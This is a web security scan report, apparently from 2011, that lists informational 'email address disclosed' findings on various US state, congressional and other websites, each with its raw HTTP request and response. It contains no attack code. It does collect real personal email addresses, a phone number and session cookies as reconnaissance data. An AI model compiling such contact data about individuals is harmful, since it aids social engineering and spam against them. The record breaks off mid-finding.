http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/353b/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js
https://market.android.com/static/client/js/1968918977-site_js_compiled_site_js.js
http://nj.gov/nj/feedback.html
http://ny.gov/contactus/accessibility.html
http://ny.gov/privacy/index.html
http://peteking.house.gov/
http://qandanj.org/
http://serrano.house.gov/
http://twitter.com/account/bootstrap_data
http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html
http://www.cio.ny.gov/universal_broadband
http://www.courts.state.ny.us/contactus/index.shtml
http://www.courts.state.ny.us/global
http://www.courts.state.ny.us/home.htm
http://www.courts.state.ny.us/privacy/index.shtml
http://www.courts.state.ny.us/publications/
http://www.courts.state.ny.us/whatsnew/
http://www.delaware.gov/apps/
http://www.facebook.com/feeds/page.php
http://www.gnu.org/licenses/gpl.html
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js
http://www.governor.ny.gov/
http://www.health.state.ny.us/health_care/epic/index.htm
http://www.health.state.ny.us/vital_records/
http://www.jerseyseafood.nj.gov/justforkids.html
http://www.judiciary.state.nj.us/
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js
http://www.nj.gov/donotcall/
http://www.njelections.org/how-where-register.html
http://www.njfishandwildlife.com/als/websalesintro.htm
http://www.njleg.state.nj.us/
http://www.njleg.state.nj.us/Default.asp
http://www.ny.gov/contactus/accessibility.html
http://www.ny.gov/privacy/index.html
http://www.nycourts.gov/ip/gfs/index.shtml
http://www.nyfirst.ny.gov/
http://www.nyhealth.gov/nysdoh/chplus/
http://www.nysegov.com/citguide.cfm
http://www.opensource.org/licenses/gpl-3.0.html
http://www.opensource.org/licenses/mit-license.php
http://www.state.nj.us/jerseyfresh/searches/pyo.htm
http://www.state.nj.us/lottery/about/6-0_about.htm
http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm
http://www.state.nj.us/lottery/where/4-0_where.htm
http://www.state.nj.us/nj/feedback.html
http://www.state.nj.us/patentbank/feedback/
http://www.state.nj.us/treasury/privacy.shtml
http://www.state.nj.us/treasury/taxation/listservice.shtml
https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

14.1. http://assembly.state.ny.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assembly.state.ny.us
Path:	/

Issue detail

The following email address was disclosed in the response:

webmaster@assembly.state.ny.us

Request

GET / HTTP/1.1
Host: assembly.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:40 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 19310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<META name="Keywords" content="New York State Assembly,
...[SNIP]...
<a href="mailto:webmaster@assembly.state.ny.us">
...[SNIP]...

14.2. http://climate.rutgers.edu/njwxnet/station.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://climate.rutgers.edu
Path:	/njwxnet/station.php

Issue detail

The following email address was disclosed in the response:

support@climate.rutgers.edu

Request

GET /njwxnet/station.php HTTP/1.1
Host: climate.rutgers.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.3. http://code.google.com/p/swfobject/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/p/swfobject/

Issue detail

The following email address was disclosed in the response:

TenSafeF...@gmail.com

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:42 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

var codes
...[SNIP]...
<a style="white-space: nowrap" href="/u/@WBRURlVTAhdC/">TenSafeF...@gmail.com</a>
...[SNIP]...

14.4. http://courts.delaware.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://courts.delaware.gov
Path:	/

Issue detail

The following email address was disclosed in the response:

Patricia.DiIenno@state.de.us

Request

GET / HTTP/1.1
Host: courts.delaware.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522455746:ss=1310522357519

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 42236
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:Patricia.DiIenno@state.de.us">
...[SNIP]...

14.5. http://grimm.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grimm.house.gov
Path:	/

Issue detail

The following email address was disclosed in the response:

your@email.com

Request

GET / HTTP/1.1
Host: grimm.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513333-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:28:53 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<input type="text" maxlength="128" name="required-valid-email" id="edit-signup-theme-form-1" size="15" value="your@email.com" title="Enter your email address." class="form-text search-field" onFocus="this.value=''"/>
...[SNIP]...

14.6. http://hanna.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hanna.house.gov
Path:	/

Issue detail

The following email address was disclosed in the response:

your@email.com

Request

GET / HTTP/1.1
Host: hanna.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513835-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:37:15 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<input type="text" maxlength="128" name="required-valid-email" id="edit-signup-theme-form-1" size="15" value="your@email.com" title="Enter your email address." class="form-text search-field" onFocus="this.value=''"/>
...[SNIP]...

14.7. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The following email addresses were disclosed in the response:

contact@appendTo.com
contact@appendto.com
hello@filamentgroup.com

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 13 Jul 2011 01:52:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

14.8. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/353b/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.gstatic.com
Path:	/cat_js/intl/en_us/mapfiles/353b/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js

Issue detail

The following email address was disclosed in the response:

pat@gmail.com

Request

GET /cat_js/intl/en_us/mapfiles/353b/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js HTTP/1.1
Host: maps.gstatic.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=488+State+Road,+Suite+1+Plymouth,+MA+02360&sll=37.0625,-95.677068&sspn=51.708931,74.267578&ie=UTF8&hq=&hnear=488+State+Rd,+Plymouth,+Massachusetts+02360&ll=42.208176,-70.883789&spn=1.017206,1.213989&z=8&output=embed
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Tue, 28 Jun 2011 00:07:14 GMT
Date: Mon, 11 Jul 2011 21:42:37 GMT
Expires: Tue, 10 Jul 2012 21:42:37 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 80408
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 136512

__gjsload_maps2__('strr', 'GAddMessages({13828:"Sign in to use stars with",13829:"Sign in »",13830:"ex: pat@gmail.com",13831:"No account yet?",13832:"It\'s free and easy.",13833:"Create an account »",13338:"Seeing stars",13339:"When you star an item, it appears on your maps and is listed in My Maps.<br />
...[SNIP]...

14.9. https://market.android.com/static/client/js/1968918977-site_js_compiled_site_js.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/static/client/js/1968918977-site_js_compiled_site_js.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

Response

14.10. http://nj.gov/nj/feedback.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nj.gov
Path:	/nj/feedback.html

Issue detail

The following email addresses were disclosed in the response:

Webmaster.Mailbox@judiciary.state.nj.us
clmand@treas.state.nj.us
info@njpines.state.nj.us
locgov@gov.state.nj.us
njht@dca.state.nj.us

Request

GET /nj/feedback.html HTTP/1.1
Host: nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:52:22 GMT
Content-length: 11645
Content-type: text/html
Last-modified: Wed, 08 Jun 2011 10:23:13 GMT
Etag: "2d7d-4def4d91"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<h
...[SNIP]...
<a href="mailto:clmand@treas.state.nj.us" target="_blank">
...[SNIP]...
<a href="mailto:Webmaster.Mailbox@judiciary.state.nj.us">
...[SNIP]...
<a href="mailto:njht@dca.state.nj.us">
...[SNIP]...
<a href="mailto:info@njpines.state.nj.us">
...[SNIP]...
<a href="mailto:locgov@gov.state.nj.us">
...[SNIP]...

14.11. http://ny.gov/contactus/accessibility.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ny.gov
Path:	/contactus/accessibility.html

Issue detail

The following email address was disclosed in the response:

policy@cio.ny.gov

Request

GET /contactus/accessibility.html HTTP/1.1
Host: ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 01 Jan 2011 01:22:14 GMT
ETag: "9400f-4a2a-498bebfaf7d80"
Accept-Ranges: bytes
Content-Length: 18986
Cache-Control: max-age=60
Expires: Wed, 13 Jul 2011 01:53:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>WWW.NY.GOV / ACCESSIBILITY</title>
<script type="text/javascript" language="JavaScript" src="/nysbanner.js"></script
...[SNIP]...
<a href="mailto:policy@cio.ny.gov"><u>policy@cio.ny.gov</u>
...[SNIP]...

14.12. http://ny.gov/privacy/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ny.gov
Path:	/privacy/index.html

Issue detail

The following email address was disclosed in the response:

policy@cio.ny.gov

Request

GET /privacy/index.html HTTP/1.1
Host: ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 01 Jan 2011 01:22:37 GMT
ETag: "53c001-669c-498bec10e7140"
Accept-Ranges: bytes
Content-Length: 26268
Cache-Control: max-age=60
Expires: Wed, 13 Jul 2011 01:53:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>WWW.NY.GOV / PRIVACY POLICY</title>
<script type="text/javascript" language="JavaScript" src="/nysbanner.js"></scrip
...[SNIP]...
<a href="mailto:policy@cio.ny.gov">policy@cio.ny.gov</a>
...[SNIP]...

14.13. http://peteking.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://peteking.house.gov
Path:	/

Issue detail

The following email address was disclosed in the response:

Pete.King@mail.house.gov

Request

GET / HTTP/1.1
Host: peteking.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.14. http://qandanj.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://qandanj.org
Path:	/

Issue detail

The following email address was disclosed in the response:

Nic@TimelapseProductions.com

Request

GET / HTTP/1.1
Host: qandanj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:53:07 GMT
Content-Length: 20482
Content-Type: text/html
Content-Location: http://qandanj.org/index.htm
Last-Modified: Tue, 22 Mar 2011 05:33:59 GMT
Accept-Ranges: bytes
ETag: "7aeb5be52e8cb1:715"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<link rel="shortcut icon" href="http://www.qandanj.org/qandan
...[SNIP]...

...[SNIP]...

14.15. http://serrano.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serrano.house.gov
Path:	/

Issue detail

The following email address was disclosed in the response:

your@email.com

Request

GET / HTTP/1.1
Host: serrano.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310519285-1"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Wed, 13 Jul 2011 01:08:05 +0000
Content-Type: text/html; charset=utf-8
Vary: Cookie
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:51:11 GMT
Date: Wed, 13 Jul 2011 01:51:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<input type="text" maxlength="128" name="required-valid-email" id="edit-signup-theme-form-1" size="15" value="your@email.com" title="Enter your email address." class="form-text search-field" onFocus="this.value=''"/>
...[SNIP]...

14.16. http://twitter.com/account/bootstrap_data previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/account/bootstrap_data

Issue detail

The following email address was disclosed in the response:

anil@dashes.com

Request

GET /account/bootstrap_data?q=cloudscan&r=0.9348335876576315 HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/?q=cloudscan
Cookie: k=173.193.214.243.1310522711741462; guest_id=v1%3A131052271223855296; _twitter_sess=BAh7CjoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwixoD0hMQE6%250AB2lkIiU5OWExZDRmMWUzN2U3MzU3MTZiMTI2Zjc0NDNmODVhNzoMY3NyZl9p%250AZCIlY2FhNmZmMWMzY2YwMWUxNTYyYWQ4NzgyMGRmMGJlMTgiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA%253D--50bfdb52e14835d473c0b9478dd99f22193f449a; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1509851687.1310522719.1310522719.1310522719.1; __utmb=43838368.2.10.1310522719; __utmc=43838368; __utmz=43838368.1310522719.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:05:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310522746-54391-59592
ETag: "6baf1d90a02fced8d3e913ca3aea9884"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 02:05:46 GMT
X-Runtime: 0.08330
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 5e1610b8d5d742da6301436957d9672dcd1808aa
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 23701
Connection: close

{"adminRights":false,"isPreflight":false,"abBuckets":{"remember_me_on_signup_83":{"bucket":"control","version":9,"experiment_key":"remember_me_on_signup_83","bucket_names":["control","experiment"]}},"
...[SNIP]...
/profile_images\/1364557668\/image_normal.jpg","id":36823,"description":"Blogger at Dashes.com, Director of @expertlabs, Partner at Activate & UN social media envoy against malaria. I love NYC & funk. anil@dashes.com or 646 833-8659.","screen_name":"anildash"},{"name":"Alec Sulkin","profile_image_url":"http:\/\/a0.twimg.com\/profile_images\/379256380\/IMG_0913_normal.JPG","id":24008967,"description":"Breaker of Sw
...[SNIP]...

14.17. http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webreflection.blogspot.com
Path:	/2009/01/32-bytes-to-know-if-your-browser-is-ie.html

Issue detail

The following email address was disclosed in the response:

maverickhunterjames@gmail.com

Request

Response

14.18. http://www.cio.ny.gov/universal_broadband previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cio.ny.gov
Path:	/universal_broadband

Issue detail

The following email addresses were disclosed in the response:

broadbandstimulus@cio.ny.gov
listserver@nysemail.state.ny.us

Request

GET /universal_broadband HTTP/1.1
Host: www.cio.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS6ae10ccb72afca1d3adad0f3130a2f0b=cggsua31kb710f7fs301ku2ui4; expires=Fri, 05-Aug-2011 05:24:42 GMT; path=/; domain=.cio.ny.gov
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:51:22 GMT
Cache-Control: must-revalidate
Connection: close
Content-Length: 34252
Content-Type: text/html; charset=utf-8
Set-Cookie: webpool=webpool_web01; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<a title="subscribe to mailing list" href="mailto:listserver@nysemail.state.ny.us?subject=subscribe%20CIO-OFT.Broadband">
...[SNIP]...
<a title="unsubscribe from mailing list" href="mailto:listserver@nysemail.state.ny.us?subject=unsubscribe%20CIO-OFT.Broadband">
...[SNIP]...
<a href="mailto:broadbandstimulus@cio.ny.gov">broadbandstimulus@cio.ny.gov</a>
...[SNIP]...

14.19. http://www.courts.state.ny.us/contactus/index.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.courts.state.ny.us
Path:	/contactus/index.shtml

Issue detail

The following email addresses were disclosed in the response:

InterpreterComplaints@courts.state.ny.us
question@nycourts.gov

Request

GET /contactus/index.shtml HTTP/1.1
Host: www.courts.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:54:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12088
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Contact Us</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/globa
...[SNIP]...
<a href="mailto:question@nycourts.gov">question@nycourts.gov</a>
...[SNIP]...
<a href="mailto:mailto:InterpreterComplaints@courts.state.ny.us">
...[SNIP]...

14.20. http://www.courts.state.ny.us/global previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.courts.state.ny.us
Path:	/global

Issue detail

The following email address was disclosed in the response:

pyow@courts.state.ny.us

Request

GET /global HTTP/1.1
Host: www.courts.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:54:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9660
ETag: "12838776ac1dc91:85a"
Last-Modified: Tue, 23 Sep 2008 18:44:51 GMT
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>404 Error - File Not Found</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<l
...[SNIP]...
<a href="mailto:pyow@courts.state.ny.us?subject=Broken Link on UCS internet website">
...[SNIP]...

14.21. http://www.courts.state.ny.us/home.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.courts.state.ny.us
Path:	/home.htm

Issue detail

The following email address was disclosed in the response:

webmaster@courts.state.ny.us

Request

GET /home.htm HTTP/1.1
Host: www.courts.state.ny.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 20748
Content-Type: text/html
Last-Modified: Thu, 23 Jun 2011 20:04:48 GMT
Accept-Ranges: bytes
ETag: "4e9a40cee031cc1:85a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:41:06 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>New York State Unified Court System</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<meta name=Reply-to content="webmaster@courts.state.ny.us">
...[SNIP]...

14.22. http://www.courts.state.ny.us/privacy/index.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.courts.state.ny.us
Path:	/privacy/index.shtml

Issue detail

The following email address was disclosed in the response:

pyow@nycourts.gov

Request

GET /privacy/index.shtml HTTP/1.1
Host: www.courts.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:54:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 20943
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Internet Web Site Privacy Policy</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...
<a href="mailto:pyow@nycourts.gov">pyow@nycourts.gov</a>
...[SNIP]...

14.23. http://www.courts.state.ny.us/publications/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.courts.state.ny.us
Path:	/publications/

Issue detail

The following email addresses were disclosed in the response:

NYA2J@courts.state.ny.us
nya2j@courts.state.ny.us

Request

GET /publications/ HTTP/1.1
Host: www.courts.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:54:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 111860
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>New York State Unified Court System - Publications</title>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<a href="mailto:nya2j@courts.state.ny.us">NYA2J@courts.state.ny.us</a>
...[SNIP]...
<a href="mailto:nya2j@courts.state.ny.us">NYA2J@courts.state.ny.us</a>
...[SNIP]...

14.24. http://www.courts.state.ny.us/whatsnew/ previous next

Summary

